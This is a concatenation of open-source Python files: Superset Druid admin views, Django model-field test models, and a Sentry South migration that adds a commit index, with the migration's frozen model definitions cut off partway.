self.post_update(col)
appbuilder.add_view_no_menu(DruidColumnInlineView)
class DruidMetricInlineView(CompactCRUDMixin, SupersetModelView): # noqa
datamodel = SQLAInterface(models.DruidMetric)
list_title = _('List Druid Metric')
show_title = _('Show Druid Metric')
add_title = _('Add Druid Metric')
edit_title = _('Edit Druid Metric')
list_columns = ['metric_name', 'verbose_name', 'metric_type']
edit_columns = [
'metric_name', 'description', 'verbose_name', 'metric_type', 'json',
'datasource', 'd3format', 'is_restricted']
add_columns = edit_columns
page_size = 500
validators_columns = {
'json': [validate_json],
}
description_columns = {
'metric_type': utils.markdown(
"use `postagg` as the metric type if you are defining a "
"[Druid Post Aggregation]"
"(http://druid.io/docs/latest/querying/post-aggregations.html)",
True),
'is_restricted': _("Whether the access to this metric is restricted "
"to certain roles. Only roles with the permission "
"'metric access on XXX (the name of this metric)' "
"are allowed to access this metric"),
}
label_columns = {
'metric_name': _("Metric"),
'description': _("Description"),
'verbose_name': _("Verbose Name"),
'metric_type': _("Type"),
'json': _("JSON"),
'datasource': _("Druid Datasource"),
}
def post_add(self, metric):
if metric.is_restricted:
security.merge_perm(sm, 'metric_access', metric.get_perm())
def post_update(self, metric):
if metric.is_restricted:
security.merge_perm(sm, 'metric_access', metric.get_perm())
appbuilder.add_view_no_menu(DruidMetricInlineView)
class DruidClusterModelView(SupersetModelView, DeleteMixin): # noqa
datamodel = SQLAInterface(models.DruidCluster)
list_title = _('List Druid Cluster')
show_title = _('Show Druid Cluster')
add_title = _('Add Druid Cluster')
edit_title = _('Edit Druid Cluster')
add_columns = [
'verbose_name', 'coordinator_host', 'coordinator_port',
'coordinator_endpoint', 'broker_host', 'broker_port',
'broker_endpoint', 'cache_timeout', 'cluster_name',
]
edit_columns = add_columns
list_columns = ['cluster_name', 'metadata_last_refreshed']
search_columns = ('cluster_name',)
label_columns = {
'cluster_name': _("Cluster"),
'coordinator_host': _("Coordinator Host"),
'coordinator_port': _("Coordinator Port"),
'coordinator_endpoint': _("Coordinator Endpoint"),
'broker_host': _("Broker Host"),
'broker_port': _("Broker Port"),
'broker_endpoint': _("Broker Endpoint"),
}
def pre_add(self, cluster):
security.merge_perm(sm, 'database_access', cluster.perm)
def pre_update(self, cluster):
self.pre_add(cluster)
def _delete(self, pk):
DeleteMixin._delete(self, pk)
appbuilder.add_view(
DruidClusterModelView,
name="Druid Clusters",
label=__("Druid Clusters"),
icon="fa-cubes",
category="Sources",
category_label=__("Sources"),
category_icon='fa-database',)
class DruidDatasourceModelView(DatasourceModelView, DeleteMixin): # noqa
datamodel = SQLAInterface(models.DruidDatasource)
list_title = _('List Druid Datasource')
show_title = _('Show Druid Datasource')
add_title = _('Add Druid Datasource')
edit_title = _('Edit Druid Datasource')
list_widget = ListWidgetWithCheckboxes
list_columns = [
'datasource_link', 'cluster', 'changed_by_', 'modified']
related_views = [DruidColumnInlineView, DruidMetricInlineView]
edit_columns = [
'datasource_name', 'cluster', 'slices', 'description', 'owner',
'is_hidden',
'filter_select_enabled', 'fetch_values_from',
'default_endpoint', 'offset', 'cache_timeout']
search_columns = (
'datasource_name', 'cluster', 'description', 'owner'
)
add_columns = edit_columns
show_columns = add_columns + ['perm']
page_size = 500
base_order = ('datasource_name', 'asc')
description_columns = {
'slices': _(
"The list of slices associated with this table. By "
"altering this datasource, you may change how these associated "
"slices behave. "
"Also note that slices need to point to a datasource, so "
"this form will fail at saving if removing slices from a "
"datasource. If you want to change the datasource for a slice, "
"overwrite the slice from the 'explore view'"),
'offset': _("Timezone offset (in hours) for this datasource"),
'description': Markup(
"Supports <a href='"
"https://daringfireball.net/projects/markdown/'>markdown</a>"),
'fetch_values_from': _(
"Time expression to use as a predicate when retrieving "
"distinct values to populate the filter component. "
"Only applies when `Enable Filter Select` is on. If "
"you enter `7 days ago`, the distinct list of values in "
"the filter will be populated based on the distinct value over "
"the past week"),
'filter_select_enabled': _(
"Whether to populate the filter's dropdown in the explore "
"view's filter section with a list of distinct values fetched "
"from the backend on the fly"),
'default_endpoint': _(
"Redirects to this endpoint when clicking on the datasource "
"from the datasource list"),
}
base_filters = [['id', DatasourceFilter, lambda: []]]
label_columns = {
'slices': _("Associated Slices"),
'datasource_link': _("Data Source"),
'cluster': _("Cluster"),
'description': _("Description"),
'owner': _("Owner"),
'is_hidden': _("Is Hidden"),
'filter_select_enabled': _("Enable Filter Select"),
'default_endpoint': _("Default Endpoint"),
'offset': _("Time Offset"),
'cache_timeout': _("Cache Timeout"),
}
def pre_add(self, datasource):
number_of_existing_datasources = db.session.query(
sqla.func.count('*')).filter(
models.DruidDatasource.datasource_name ==
datasource.datasource_name,
models.DruidDatasource.cluster_name == datasource.cluster.id
).scalar()
# table object is already added to the session
if number_of_existing_datasources > 1:
raise Exception(get_datasource_exist_error_mgs(
datasource.full_name))
def post_add(self, datasource):
datasource.generate_metrics()
security.merge_perm(sm, 'datasource_access', datasource.get_perm())
if datasource.schema:
security.merge_perm(sm, 'schema_access', datasource.schema_perm)
def post_update(self, datasource):
self.post_add(datasource)
def _delete(self, pk):
DeleteMixin._delete(self, pk)
appbuilder.add_view(
DruidDatasourceModelView,
"Druid Datasources",
label=__("Druid Datasources"),
category="Sources",
category_label=__("Sources"),
icon="fa-cube")
class Druid(BaseSupersetView):
"""The base views for Superset!"""
@has_access
@expose("/refresh_datasources/")
def refresh_datasources(self):
"""endpoint that refreshes druid datasources metadata"""
session = db.session()
DruidCluster = ConnectorRegistry.sources['druid'].cluster_class
for cluster in session.query(DruidCluster).all():
cluster_name = cluster.cluster_name
try:
cluster.refresh_datasources()
except Exception as e:
flash(
"Error while processing cluster '{}'\n{}".format(
cluster_name, utils.error_msg_from_exception(e)),
"danger")
logging.exception(e)
return redirect('/druidclustermodelview/list/')
cluster.metadata_last_refreshed = datetime.now()
flash(
"Refreshed metadata from cluster "
"[" + cluster.cluster_name + "]",
'info')
session.commit()
return redirect("/druiddatasourcemodelview/list/")
appbuilder.add_view_no_menu(Druid)
appbuilder.add_link(
"Refresh Druid Metadata",
label=__("Refresh Druid Metadata"),
href='/druid/refresh_datasources/',
category='Sources',
category_label=__("Sources"),
category_icon='fa-database',
icon="fa-cog")
appbuilder.add_separator("Sources", )
|
apache-2.0
|
raphaelmerx/django
|
tests/model_fields/models.py
|
210
|
12155
|
import os
import tempfile
import uuid
from django.contrib.contenttypes.fields import (
GenericForeignKey, GenericRelation,
)
from django.contrib.contenttypes.models import ContentType
from django.core.files.storage import FileSystemStorage
from django.db import models
from django.db.models.fields.files import ImageField, ImageFieldFile
from django.db.models.fields.related import (
ForeignKey, ForeignObject, ManyToManyField, OneToOneField,
)
from django.utils import six
try:
from PIL import Image
except ImportError:
Image = None
class Foo(models.Model):
a = models.CharField(max_length=10)
d = models.DecimalField(max_digits=5, decimal_places=3)
def get_foo():
return Foo.objects.get(id=1).pk
class Bar(models.Model):
b = models.CharField(max_length=10)
a = models.ForeignKey(Foo, models.CASCADE, default=get_foo, related_name=b'bars')
class Whiz(models.Model):
CHOICES = (
('Group 1', (
(1, 'First'),
(2, 'Second'),
)
),
('Group 2', (
(3, 'Third'),
(4, 'Fourth'),
)
),
(0, 'Other'),
)
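# Note: nested tuples produce grouped choices; the first element of each
# outer pair is the group label, while (0, 'Other') sits outside any group.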
c = models.IntegerField(choices=CHOICES, null=True)
class Counter(six.Iterator):
def __init__(self):
self.n = 1
def __iter__(self):
return self
def __next__(self):
if self.n > 5:
raise StopIteration
else:
self.n += 1
return (self.n, 'val-' + str(self.n))
class WhizIter(models.Model):
c = models.IntegerField(choices=Counter(), null=True)
class WhizIterEmpty(models.Model):
c = models.CharField(choices=(x for x in []), blank=True, max_length=1)
class BigD(models.Model):
d = models.DecimalField(max_digits=38, decimal_places=30)
class FloatModel(models.Model):
size = models.FloatField()
class BigS(models.Model):
s = models.SlugField(max_length=255)
class UnicodeSlugField(models.Model):
s = models.SlugField(max_length=255, allow_unicode=True)
class SmallIntegerModel(models.Model):
value = models.SmallIntegerField()
class IntegerModel(models.Model):
value = models.IntegerField()
class BigIntegerModel(models.Model):
value = models.BigIntegerField()
null_value = models.BigIntegerField(null=True, blank=True)
class PositiveSmallIntegerModel(models.Model):
value = models.PositiveSmallIntegerField()
class PositiveIntegerModel(models.Model):
value = models.PositiveIntegerField()
class Post(models.Model):
title = models.CharField(max_length=100)
body = models.TextField()
class NullBooleanModel(models.Model):
nbfield = models.NullBooleanField()
class BooleanModel(models.Model):
bfield = models.BooleanField(default=None)
string = models.CharField(max_length=10, default='abc')
class DateTimeModel(models.Model):
d = models.DateField()
dt = models.DateTimeField()
t = models.TimeField()
class DurationModel(models.Model):
field = models.DurationField()
class NullDurationModel(models.Model):
field = models.DurationField(null=True)
class PrimaryKeyCharModel(models.Model):
string = models.CharField(max_length=10, primary_key=True)
class FksToBooleans(models.Model):
"""Model with FKs to models with {Null,}BooleanField's, #15040"""
bf = models.ForeignKey(BooleanModel, models.CASCADE)
nbf = models.ForeignKey(NullBooleanModel, models.CASCADE)
class FkToChar(models.Model):
"""Model with FK to a model with a CharField primary key, #19299"""
out = models.ForeignKey(PrimaryKeyCharModel, models.CASCADE)
class RenamedField(models.Model):
modelname = models.IntegerField(name="fieldname", choices=((1, 'One'),))
class VerboseNameField(models.Model):
id = models.AutoField("verbose pk", primary_key=True)
field1 = models.BigIntegerField("verbose field1")
field2 = models.BooleanField("verbose field2", default=False)
field3 = models.CharField("verbose field3", max_length=10)
field4 = models.CommaSeparatedIntegerField("verbose field4", max_length=99)
field5 = models.DateField("verbose field5")
field6 = models.DateTimeField("verbose field6")
field7 = models.DecimalField("verbose field7", max_digits=6, decimal_places=1)
field8 = models.EmailField("verbose field8")
field9 = models.FileField("verbose field9", upload_to="unused")
field10 = models.FilePathField("verbose field10")
field11 = models.FloatField("verbose field11")
# Don't want to depend on Pillow in this test
# field_image = models.ImageField("verbose field")
field12 = models.IntegerField("verbose field12")
field13 = models.GenericIPAddressField("verbose field13", protocol="ipv4")
field14 = models.NullBooleanField("verbose field14")
field15 = models.PositiveIntegerField("verbose field15")
field16 = models.PositiveSmallIntegerField("verbose field16")
field17 = models.SlugField("verbose field17")
field18 = models.SmallIntegerField("verbose field18")
field19 = models.TextField("verbose field19")
field20 = models.TimeField("verbose field20")
field21 = models.URLField("verbose field21")
field22 = models.UUIDField("verbose field22")
field23 = models.DurationField("verbose field23")
class GenericIPAddress(models.Model):
ip = models.GenericIPAddressField(null=True, protocol='ipv4')
###############################################################################
# These models aren't used in any test, just here to ensure they validate
# successfully.
# See ticket #16570.
class DecimalLessThanOne(models.Model):
d = models.DecimalField(max_digits=3, decimal_places=3)
# See ticket #18389.
class FieldClassAttributeModel(models.Model):
field_class = models.CharField
###############################################################################
class DataModel(models.Model):
short_data = models.BinaryField(max_length=10, default=b'\x08')
data = models.BinaryField()
###############################################################################
# FileField
class Document(models.Model):
myfile = models.FileField(upload_to='unused')
###############################################################################
# ImageField
# If Pillow available, do these tests.
if Image:
class TestImageFieldFile(ImageFieldFile):
"""
Custom Field File class that records whether or not the underlying file
was opened.
"""
def __init__(self, *args, **kwargs):
self.was_opened = False
super(TestImageFieldFile, self).__init__(*args, **kwargs)
def open(self):
self.was_opened = True
super(TestImageFieldFile, self).open()
class TestImageField(ImageField):
attr_class = TestImageFieldFile
# Set up a temp directory for file storage.
temp_storage_dir = tempfile.mkdtemp()
temp_storage = FileSystemStorage(temp_storage_dir)
temp_upload_to_dir = os.path.join(temp_storage.location, 'tests')
class Person(models.Model):
"""
Model that defines an ImageField with no dimension fields.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests')
class AbsctractPersonWithHeight(models.Model):
"""
Abstract model that defines an ImageField with only one dimension field
to make sure the dimension update is correctly run on concrete subclass
instance post-initialization.
"""
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height')
mugshot_height = models.PositiveSmallIntegerField()
class Meta:
abstract = True
class PersonWithHeight(AbsctractPersonWithHeight):
"""
Concrete model that subclasses an abstract one with only one dimension
field.
"""
name = models.CharField(max_length=50)
class PersonWithHeightAndWidth(models.Model):
"""
Model that defines height and width fields after the ImageField.
"""
name = models.CharField(max_length=50)
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
class PersonDimensionsFirst(models.Model):
"""
Model that defines height and width fields before the ImageField.
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
class PersonTwoImages(models.Model):
"""
Model that:
* Defines two ImageFields
* Defines the height/width fields before the ImageFields
* Has a nullable ImageField
"""
name = models.CharField(max_length=50)
mugshot_height = models.PositiveSmallIntegerField()
mugshot_width = models.PositiveSmallIntegerField()
mugshot = TestImageField(storage=temp_storage, upload_to='tests',
height_field='mugshot_height',
width_field='mugshot_width')
headshot_height = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot_width = models.PositiveSmallIntegerField(
blank=True, null=True)
headshot = TestImageField(blank=True, null=True,
storage=temp_storage, upload_to='tests',
height_field='headshot_height',
width_field='headshot_width')
class AllFieldsModel(models.Model):
big_integer = models.BigIntegerField()
binary = models.BinaryField()
boolean = models.BooleanField(default=False)
char = models.CharField(max_length=10)
csv = models.CommaSeparatedIntegerField(max_length=10)
date = models.DateField()
datetime = models.DateTimeField()
decimal = models.DecimalField(decimal_places=2, max_digits=2)
duration = models.DurationField()
email = models.EmailField()
file_path = models.FilePathField()
floatf = models.FloatField()
integer = models.IntegerField()
generic_ip = models.GenericIPAddressField()
null_boolean = models.NullBooleanField()
positive_integer = models.PositiveIntegerField()
positive_small_integer = models.PositiveSmallIntegerField()
slug = models.SlugField()
small_integer = models.SmallIntegerField()
text = models.TextField()
time = models.TimeField()
url = models.URLField()
uuid = models.UUIDField()
fo = ForeignObject(
'self',
on_delete=models.CASCADE,
from_fields=['abstract_non_concrete_id'],
to_fields=['id'],
related_name='reverse'
)
fk = ForeignKey(
'self',
models.CASCADE,
related_name='reverse2'
)
m2m = ManyToManyField('self')
oto = OneToOneField('self', models.CASCADE)
object_id = models.PositiveIntegerField()
content_type = models.ForeignKey(ContentType, models.CASCADE)
gfk = GenericForeignKey()
gr = GenericRelation(DataModel)
###############################################################################
class UUIDModel(models.Model):
field = models.UUIDField()
class NullableUUIDModel(models.Model):
field = models.UUIDField(blank=True, null=True)
class PrimaryKeyUUIDModel(models.Model):
id = models.UUIDField(primary_key=True, default=uuid.uuid4)
class RelatedToUUIDModel(models.Model):
uuid_fk = models.ForeignKey('PrimaryKeyUUIDModel', models.CASCADE)
class UUIDChild(PrimaryKeyUUIDModel):
pass
class UUIDGrandchild(UUIDChild):
pass
|
bsd-3-clause
|
jean/sentry
|
src/sentry/south_migrations/0274_auto__add_index_commit_repository_id_date_added.py
|
4
|
87196
|
# -*- coding: utf-8 -*-
from south.utils import datetime_utils as datetime
from south.db import db
from south.v2 import SchemaMigration
from django.db import models
class Migration(SchemaMigration):
def forwards(self, orm):
# Adding index on 'Commit', fields ['repository_id', 'date_added']
db.create_index('sentry_commit', ['repository_id', 'date_added'])
def backwards(self, orm):
# Removing index on 'Commit', fields ['repository_id', 'date_added']
db.delete_index('sentry_commit', ['repository_id', 'date_added'])
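# The actual schema change is just the composite index above; the 'models'
# dict below is South's frozen snapshot of every model at this migration.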
models = {
'sentry.activity': {
'Meta': {
'object_name': 'Activity'
},
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {
'null': 'True'
}),
'datetime':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'group': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Group']",
'null': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']"
}
),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']",
'null': 'True'
}
)
},
'sentry.apikey': {
'Meta': {
'object_name': 'ApiKey'
},
'allowed_origins':
('django.db.models.fields.TextField', [], {
'null': 'True',
'blank': 'True'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '32'
}),
'label': (
'django.db.models.fields.CharField', [], {
'default': "'Default'",
'max_length': '64',
'blank': 'True'
}
),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'related_name': "'key_set'",
'to': "orm['sentry.Organization']"
}
),
'scopes': ('django.db.models.fields.BigIntegerField', [], {
'default': 'None'
}),
'status': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '0',
'db_index': 'True'
}
)
},
'sentry.apitoken': {
'Meta': {
'object_name': 'ApiToken'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.ApiKey']",
'null': 'True'
}
),
'scopes': ('django.db.models.fields.BigIntegerField', [], {
'default': 'None'
}),
'token':
('django.db.models.fields.CharField', [], {
'unique': 'True',
'max_length': '64'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.auditlogentry': {
'Meta': {
'object_name': 'AuditLogEntry'
},
'actor': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'audit_actors'",
'null': 'True',
'to': "orm['sentry.User']"
}
),
'actor_key': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.ApiKey']",
'null': 'True',
'blank': 'True'
}
),
'actor_label': (
'django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True',
'blank': 'True'
}
),
'data': ('sentry.db.models.fields.gzippeddict.GzippedDictField', [], {}),
'datetime':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ip_address': (
'django.db.models.fields.GenericIPAddressField', [], {
'max_length': '39',
'null': 'True'
}
),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']"
}
),
'target_object':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
}),
'target_user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'blank': 'True',
'related_name': "'audit_targets'",
'null': 'True',
'to': "orm['sentry.User']"
}
)
},
'sentry.authenticator': {
'Meta': {
'unique_together': "(('user', 'type'),)",
'object_name': 'Authenticator',
'db_table': "'auth_authenticator'"
},
'config': ('sentry.db.models.fields.pickle.UnicodePickledObjectField', [], {}),
'created_at':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id': ('sentry.db.models.fields.bounded.BoundedAutoField', [], {
'primary_key': 'True'
}),
'last_used_at': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'type': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.authidentity': {
'Meta': {
'unique_together': "(('auth_provider', 'ident'), ('auth_provider', 'user'))",
'object_name': 'AuthIdentity'
},
'auth_provider': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.AuthProvider']"
}
),
'data': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'ident': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'last_synced':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'last_verified':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.authprovider': {
'Meta': {
'object_name': 'AuthProvider'
},
'config': ('jsonfield.fields.JSONField', [], {
'default': '{}'
}),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'default_global_access':
('django.db.models.fields.BooleanField', [], {
'default': 'True'
}),
'default_role':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'default': '50'
}),
'default_teams': (
'django.db.models.fields.related.ManyToManyField', [], {
'to': "orm['sentry.Team']",
'symmetrical': 'False',
'blank': 'True'
}
),
'flags': ('django.db.models.fields.BigIntegerField', [], {
'default': '0'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'last_sync': ('django.db.models.fields.DateTimeField', [], {
'null': 'True'
}),
'organization': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Organization']",
'unique': 'True'
}
),
'provider': ('django.db.models.fields.CharField', [], {
'max_length': '128'
}),
'sync_time':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'null': 'True'
})
},
'sentry.broadcast': {
'Meta': {
'object_name': 'Broadcast'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'date_expires': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime(2016, 10, 17, 0, 0)',
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'is_active':
('django.db.models.fields.BooleanField', [], {
'default': 'True',
'db_index': 'True'
}),
'link': (
'django.db.models.fields.URLField', [], {
'max_length': '200',
'null': 'True',
'blank': 'True'
}
),
'message': ('django.db.models.fields.CharField', [], {
'max_length': '256'
}),
'title': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'upstream_id': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'null': 'True',
'blank': 'True'
}
)
},
'sentry.broadcastseen': {
'Meta': {
'unique_together': "(('broadcast', 'user'),)",
'object_name': 'BroadcastSeen'
},
'broadcast': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Broadcast']"
}
),
'date_seen':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'user': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.User']"
}
)
},
'sentry.commit': {
'Meta': {
'unique_together': "(('repository_id', 'key'),)",
'object_name': 'Commit',
'index_together': "(('repository_id', 'date_added'),)"
},
'author': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.CommitAuthor']",
'null': 'True'
}
),
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'key': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'message': ('django.db.models.fields.TextField', [], {
'null': 'True'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
),
'repository_id':
('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.commitauthor': {
'Meta': {
'unique_together': "(('organization_id', 'email'),)",
'object_name': 'CommitAuthor'
},
'email': ('django.db.models.fields.EmailField', [], {
'max_length': '75'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name':
('django.db.models.fields.CharField', [], {
'max_length': '128',
'null': 'True'
}),
'organization_id': (
'sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {
'db_index': 'True'
}
)
},
'sentry.counter': {
'Meta': {
'object_name': 'Counter',
'db_table': "'sentry_projectcounter'"
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.Project']",
'unique': 'True'
}
),
'value': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.dsymbundle': {
'Meta': {
'object_name': 'DSymBundle'
},
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymObject']"
}
),
'sdk': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymSDK']"
}
)
},
'sentry.dsymobject': {
'Meta': {
'object_name': 'DSymObject'
},
'cpu_name': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object_path': ('django.db.models.fields.TextField', [], {
'db_index': 'True'
}),
'uuid':
('django.db.models.fields.CharField', [], {
'max_length': '36',
'db_index': 'True'
}),
'vmaddr':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
}),
'vmsize':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True'
})
},
'sentry.dsymsdk': {
'Meta': {
'object_name':
'DSymSDK',
'index_together':
"[('version_major', 'version_minor', 'version_patchlevel', 'version_build')]"
},
'dsym_type':
('django.db.models.fields.CharField', [], {
'max_length': '20',
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'sdk_name': ('django.db.models.fields.CharField', [], {
'max_length': '20'
}),
'version_build': ('django.db.models.fields.CharField', [], {
'max_length': '40'
}),
'version_major': ('django.db.models.fields.IntegerField', [], {}),
'version_minor': ('django.db.models.fields.IntegerField', [], {}),
'version_patchlevel': ('django.db.models.fields.IntegerField', [], {})
},
'sentry.dsymsymbol': {
'Meta': {
'unique_together': "[('object', 'address')]",
'object_name': 'DSymSymbol'
},
'address':
('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'db_index': 'True'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'object': (
'sentry.db.models.fields.foreignkey.FlexibleForeignKey', [], {
'to': "orm['sentry.DSymObject']"
}
),
'symbol': ('django.db.models.fields.TextField', [], {})
},
'sentry.environment': {
'Meta': {
'unique_together': "(('project_id', 'name'),)",
'object_name': 'Environment'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'name': ('django.db.models.fields.CharField', [], {
'max_length': '64'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedPositiveIntegerField', [], {})
},
'sentry.event': {
'Meta': {
'unique_together': "(('project_id', 'event_id'),)",
'object_name': 'Event',
'db_table': "'sentry_message'",
'index_together': "(('group_id', 'datetime'),)"
},
'data':
('sentry.db.models.fields.node.NodeField', [], {
'null': 'True',
'blank': 'True'
}),
'datetime': (
'django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now',
'db_index': 'True'
}
),
'event_id': (
'django.db.models.fields.CharField', [], {
'max_length': '32',
'null': 'True',
'db_column': "'message_id'"
}
),
'group_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'message': ('django.db.models.fields.TextField', [], {}),
'platform':
('django.db.models.fields.CharField', [], {
'max_length': '64',
'null': 'True'
}),
'project_id': (
'sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {
'null': 'True',
'blank': 'True'
}
),
'time_spent':
('sentry.db.models.fields.bounded.BoundedIntegerField', [], {
'null': 'True'
})
},
'sentry.eventmapping': {
'Meta': {
'unique_together': "(('project_id', 'event_id'),)",
'object_name': 'EventMapping'
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
}),
'event_id': ('django.db.models.fields.CharField', [], {
'max_length': '32'
}),
'group_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {}),
'id':
('sentry.db.models.fields.bounded.BoundedBigAutoField', [], {
'primary_key': 'True'
}),
'project_id': ('sentry.db.models.fields.bounded.BoundedBigIntegerField', [], {})
},
'sentry.eventtag': {
'Meta': {
'unique_together':
"(('event_id', 'key_id', 'value_id'),)",
'object_name':
'EventTag',
'index_together':
"(('project_id', 'key_id', 'value_id'), ('group_id', 'key_id', 'value_id'))"
},
'date_added':
('django.db.models.fields.DateTimeField', [], {
'default': 'datetime.datetime.now'
